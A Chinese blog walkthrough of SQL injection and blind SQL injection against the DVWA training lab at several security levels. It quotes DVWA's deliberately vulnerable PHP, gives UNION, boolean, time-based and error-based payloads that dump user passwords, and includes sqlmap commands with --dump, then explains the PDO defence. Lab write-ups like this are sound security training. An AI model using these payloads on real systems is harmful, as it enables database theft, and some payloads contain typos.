dvwa之SQL注入&盲注

最新推荐文章于 2024-03-19 16:41:37 发布
最新推荐文章于 2024-03-19 16:41:37 发布
阅读量4.3k 收藏 32
点赞数 2
分类专栏: web 文章标签: sql注入 dvwa 盲注 sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shannow_123/article/details/90671082
版权

dvwa之SQL注入

sql注入

手工注入思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定显示的字段顺序

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.下载数据

low

我们先看一下源码,没有对查询内容进行过滤

 <?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

1.判断注入类型

首先输入1' and '1'='2
在这里插入图片描述
然后输入1' and '1'='1,出现id为1的查询结果
在这里插入图片描述
在输入1' or '1'='1,出现多个结果,证明存在字符型注入漏洞
在这里插入图片描述

2.判断字段数

ORDER BY 1 表示 所select 的字段按第一个字段排序,当后面跟的数字超过字段数时,则显示错误
在这里插入图片描述
当输入order by 3时无反应,说明字段有两个

3.确定显示的字段顺序

输入1′ union select 111,222 #,查询成功:
在这里插入图片描述
这里union是联合查询 ,找到输出111,222的地方

4.获取当前数据库

输入1' union select 111,database()#,确定数据库名为dvwa
在这里插入图片描述

5.获取数据库中的表名

输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述

6.获取表中的字段名

查询users表中的字段名
1' union select group_concat(column_name) from information_schema.columns where table_name='guestbook',group_concat(column_name) from information_schema.columns where table_name='users'#
在这里插入图片描述

7.下载数据

1' or '1'='1' union select group_concat(user_id,first_name,last_name,user) ,group_concat(password) from users#在这里插入图片描述

medium

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);//对特殊符号转义

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

Medium级别的代码利用mysql_real_escape_string函数对特殊符号
\x00,\n,\r,,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。
我们可以通过burpsuit抓包改参数
遇到字符转义时可以用base64替代

1.判断注入类型

将输入的数据改为1 or 1=1,判断为数字型注入
在这里插入图片描述

2.判断字段数

1 order by 2#,查询成功
在这里插入图片描述
1 order by 3#,查询失败
在这里插入图片描述判断数据库有两个

3.确定显示的字段顺序

在这里插入图片描述

4.获取当前数据库

在这里插入图片描述

5.获取数据库中的表名

在这里插入图片描述

6.获取表中的字段名

这里的单引号被转义了,users用base64转换为757365727
在这里插入图片描述

7.下载数据

1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
在这里插入图片描述

high

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";## 只显示一条结果
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>

high级别的代码对查询结果加了LIMIT 1的限制条件,最多出现一条结果,我们可以将其注释掉,注入过程与low相同
在这里插入图片描述

impossoble

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

        // Get results
        if( $data->rowCount() == 1 ) {
            // Feedback for end user
            echo '<pre>User ID exists in the database.</pre>';
        }
        else {
            // User wasn't found, so the page wasn't!
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

            // Feedback for end user
            echo '<pre>User ID is MISSING from the database.</pre>';
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了拖库,Anti-CSRFtoken机制的加入了进一步提高了安全性。

sql盲注

盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

盲注的基本步骤

1.判断是否存在注入,注入是字符型还是数字型

2.猜解当前数据库名

3.猜解数据库中的表名

4.猜解表中的字段名

5.猜解数据

盲注的三种思路

  1. 对于基于布尔的盲注
    可通过构造真or假判断条件(数据库各项信息取值的大小比较,如:字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…),将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果(True、False);然后不断调整判断条件中的数值以逼近真实值,特别是需要关注响应从True<–>False发生变化的转折点。
  2. 对于基于时间的盲注
    通过构造真or假判断条件的sql语句,且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求,观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。
  3. 对于基于报错的盲注
    搜寻查看网上部分Blog,基本是在rand()函数作为group by的字段进行联用的时候会违反Mysql的约定而报错。rand()随机不确定性,使得group by会使用多次而报错。
    目前阶段暂未对基于报错类型的盲注深入了解过,若可能后续再作补充分析。

(这段话有点别扭。。。直接看下面例子吧

sqlmap盲注

加参数–level 5

手工盲注

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

基于布尔的盲注

1. 判断是否存在注入,注入是字符型还是数字型

输入1'and '1'='1,判断条件正确
在这里插入图片描述
输入1' and '1'='2,判断条件错误
在这里插入图片描述
确定条件正确及错误的输出结果

2.猜解当前数据库名

我们首先来猜下数据库名的长度
输入1' and length(database())=4#
在这里插入图片描述
确定长度为4
然后猜数据库名字,可用二分法节省时间

输入1’ and ascii(substr(databse(),0,1))=0 #,显示存在,说明数据库名的第1个字符的ascii值为0(空字符)

输入1’ and ascii(substr(databse(),1,1))>97 #,显示存在,说明数据库名的第2个字符的ascii值大于97(小写字母a的ascii值);

输入1’ and ascii(substr(databse(),1,1))<122 #,显示存在,说明数据库名的第2个字符的ascii值小于122(小写字母z的ascii值);

输入1’ and ascii(substr(databse(),1,1))<109 #,显示存在,说明数据库名的第2个字符的ascii值小于109(小写字母m的ascii值);

输入1’ and ascii(substr(databse(),1,1))<103 #,显示存在,说明数据库名的第2个字符的ascii值小于103(小写字母g的ascii值);

输入1’ and ascii(substr(databse(),1,1))<100 #,显示不存在,说明数据库名的第2个字符的ascii值不小于100(小写字母d的ascii值);

输入1’ and ascii(substr(databse(),1,1))>100 #,显示不存在,说明数据库名的第2个字符的ascii值不大于100(小写字母d的ascii值),所以数据库名的第一个字符的ascii值为100,即小写字母d。
3.猜解数据库中的表名

首先猜解数据库中表的数量:

1’ and (select count (table_name) from information_schema.tables where table_schema=database())=1 # 显示不存在

1’ and (select count (table_name) from information_schema.tables where table_schema=database() )=2 # 显示存在

说明数据库中共有两个表。

接着挨个猜解表名:

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 显示不存在

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # 显示不存在

…

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 显示存在

说明第一个表名长度为9。

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 显示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 显示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 # 显示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # 显示不存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # 显示不存在

说明第一个表的名字的第一个字符为小写字母g。

重复上述步骤,即可猜解出两个表名(guestbook、users)。

4.猜解表中的字段名& 5.猜解数据

步骤同上,先猜数据数目,再猜值

基于时间的盲注

1.判断是否存在注入,注入是字符型还是数字型

输入1’ and sleep(5) #,感觉到明显延迟;

输入1 and sleep(5) #,没有延迟;

说明存在字符型的基于时间的盲注。
2.猜解当前数据库名

首先猜解数据名的长度:

1’ and if(length(database())=1,sleep(5),1) # 没有延迟

1’ and if(length(database())=2,sleep(5),1) # 没有延迟

1’ and if(length(database())=3,sleep(5),1) # 没有延迟

1’ and if(length(database())=4,sleep(5),1) # 明显延迟

说明数据库名长度为4个字符。

接着采用二分法猜解数据库名:

1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 明显延迟

…

1’ and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟

1’ and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 没有延迟

说明数据库名的第一个字符为小写字母d。

…

重复上述步骤,即可猜解出数据库名。
接下来的过程不再赘述

基于报错的盲注

Xpath

extractvalue(XML_document,XPath_string):从目标XML中返回包含的查询值的字符串,第一个参数为XML文档对象的名称,第二个参数为Xpath格式的字符串,即/xx/xxx/xxx
payload:1' and extractvalue(1,concat(0x7e,(version()),0x7e) --+
第二个参数格式与Xpath格式不匹配,会将concat(0x7e,(version()),0x7e返回
我们可以借此得到自己想要的信息,如:
1' and extractvalue(1,concat(0x7e,(database()),0x7e) --+

floor

1' and (select count from group by concat(payload,floor(rand(0)*2)) --+

使用sqlmap 扫描

下载 sqlmap,链接为https://github.com/sqlmapproject/sqlmap,sqlmap运行需有java环境

low

cmd执行命令python2 sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=3gj8vid12lbkpi79jk98bf8hc6" --batch

检查是否存在注入点

在这里插入图片描述根据回显判断注入点为ID,使用mysql数据库

获取数据库

E:\web_security\sqlmap-master>python2 sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit##" --cookie="security=low; PHPSESSID=3gj8vid12lbkpi79jk98bf8hc6" --current-db
在这里插入图片描述获取数据库名为dvwa

获取列名

E:\web_security\sqlmap-master>python2 sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit##" --cookie="security=low; PHPSESSID=3gj8vid12lbkpi79jk98bf8hc6" --columns
在这里插入图片描述

获取用户信息

E:\web_security\sqlmap-master>python2 sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit##" --cookie="security=low; PHPSESSID=3gj8vid12lbkpi79jk98bf8hc6" --dump -T users
在这里插入图片描述

medium

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?>

根据源代码发现使用了post方法,且前端输入有限制

用burpsuit抓包

在这里插入图片描述将抓到的流量包存到sqlmap的目录下,命名为search-test.txt

检查是否存在注入点

E:\web_security\sqlmap-master>python2 sqlmap.py -r search-test.txt --batch
在这里插入图片描述

获取数据库名

python2 sqlmap.py -r search-test.txt -p id --current-db
在这里插入图片描述

获取表名

E:\web_security\sqlmap-master>python2 sqlmap.py -r search-test.txt -p id --tables -D dvwa
在这里插入图片描述

获取列名

E:\web_security\sqlmap-master>python2 sqlmap.py -r search-test.txt -p id --columns -D dvwa -T users
在这里插入图片描述

获取用户信息

E:\web_security\sqlmap-master>python2 sqlmap.py -r search-test.txt -p id --dump -D dvwa -T users
在这里插入图片描述

high

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?> 
高级对注入点和回显不在一个界面,需要制定响应界面判断真假。--second-order后门跟一个判断页面的URL地址。
检查是否存在注入点

E:\web_security\sqlmap-master>python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data "id=1&Submit=Submit" --second-url="http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t2julhmvjkr1gamdokk9659drc" --banner

在这里插入图片描述

获取数据库名

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data "id=1&Submit=Submit" --second-url="http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t2julhmvjkr1gamdokk9659drc" --current-db
在这里插入图片描述

获取表名

E:\web_security\sqlmap-master>python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data "id=1&Submit=Submit" --second-url="http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t2julhmvjkr1gamdokk9659drc" --tables -D dvwa

在这里插入图片描述

获取列名

E:\web_security\sqlmap-master>python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data "id=1&Submit=Submit" --second-url="http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t2julhmvjkr1gamdokk9659drc" --columns -D dvwa -T users
在这里插入图片描述

获取用户信息

E:\web_security\sqlmap-master>python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data "id=1&Submit=Submit" --second-url="http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1;security=high; PHPSESSID=t2julhmvjkr1gamdokk9659drc" --dump -D dvwa -T users -C "user,password"

在这里插入图片描述

Impossible

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。

曙雀
关注
专栏目录
DVWA通关攻略之SQL注入
hongji728696的博客
09-03 1007
SQL注入是发生在应用程序与数据库的安全漏洞,简而言之,即黑客将Web页面原参数修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行SQL命令,从而实现获取数据库的信息以及提权目的的一种技术。
Dvwa之SQL盲注全级别学习笔记
Mbys_Lettuce的博客
09-19 1362
注入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII中97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
DVWA下的SQL注入
07-25
SQL
DVWASQL注入盲注
天空之蓝的博客
11-17 3247
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA之 SQL Injection(Blind)
谢公子的博客
08-05 2796
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,...
DVWAsql注入——盲注
Williamanddog的博客
12-22 3175
DVWA盲注
SQL注入盲注)--DVWA
xy_sugar的博客
01-24 767
概述 、 分类:布尔型、延时型 LOW等级 手工 1、首先了解业务,这里和回显注入不一样,不会显示id对应的用户名,只是告诉我们他存在即为真 输入-1,返回为假 三种注入POC(真 and 假=假) 尝试第一种情况,返回为真,说明数据没有注入进去,不存在SQL注入漏洞 输入第二种情况1' and '1024'='1025 ,返回结果为假没说明存在注入漏洞 尝...
DVWASQL注入
geejkse_seff的博客
07-30 384
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
基于dvwa的sql盲注(Blind)-低中高
滕财然的博客
11-15 2872
目录sql盲注sql注入的区别sql盲注过程dvwa-SQL Injection (Blind) low级别布尔盲注时间盲注dvwa-SQL Injection (Blind) Medium级别dvwa-SQL Injection (Blind) High级别 sql盲注sql注入的区别 盲注:目标只会回复是或不是,没有详细内容 注入:可以查看到详细内容 盲注分为:布尔盲注、时间盲注...
DVWA(sql注入 盲注)
weixin_44023403的博客
12-20 540
sql注入盲注)SQL Injection(盲注)LowMediumHigh SQL Injection(盲注) SQL盲注,其实和SQL注入差不多,只是比它难一点利用,注入时返回的数据只有正确和错误,不会返回其他信息。 基于布尔的盲注 可通过构造真or假判断条件(数据库各项信息取值的大小比较,如:字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…),将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果(True、False);然后不断调整判断条件中
DVWAsql注入盲注
qq_74806534的博客
02-12 490
盲注,与一般注入的区别在于,一般地注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。
DVWASQL注入(SQL Injection)
qq_39682037的博客
03-20 2243
SQL注入(SQL Injection) SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 Security Level: low 测试流程 输入1 输入2 输入1‘,无响应 输入1 and 1=1 输入1 and 1=2 故猜测sql语句结构为 select First name的列名 and Surname的列名 from ...
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 2015
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
DVWA SQL注入
Xiayuyuren_Study的博客
06-21 504
SQL注入漏洞作为OWASP TOP10中重要的一部分 一、原理 通过web程序,在数据库里执行任意SQL语句。根源在于程序命令和用户数据(用户输入)之间没有做到分开。 二、发现 1、确认注入POC (1)检测是否存在注入: 可以得知此处位注入点,尝试输入 ‘ (英文单引号)时,出现如下错误提示: You have an error in your SQL syntax; check t...
DVWA-SQL注入
acdcccc的博客
08-26 328
分享DVWA靶场的SQL注入过程
DVWA靶场-SQL Injection (Blind)SQL注入盲注
最新发布
mlws1900的博客
03-19 1555
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
dvwa sql注入盲注
10-09
Blind SQL注入是一种攻击技术,它利用应用程序对数据库的查询结果进行布尔判断来推断出数据的信息。在DVWA(Damn Vulnerable Web Application)中进行盲注的过程也类似。下面是一个简单的示例: 假设我们有一个登录页面,我们可以通过输入用户名和密码来验证用户身份。在用户名字段中,我们可以尝试输入一些恶意的代码来触发SQL注入漏洞。例如,我们可以使用如下的输入进行测试: `admin' AND SUBSTRING(password, 1, 1) = 'a' --` 这个输入的目的是判断数据库中的密码字段的第一个字符是否是 'a'。如果页面在进行查询时,没有正确地处理输入,那么它可能会返回一个成功的结果,表示我们的猜测是正确的。通过不断尝试不同的字符和位置,我们可以逐步推断出整个密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值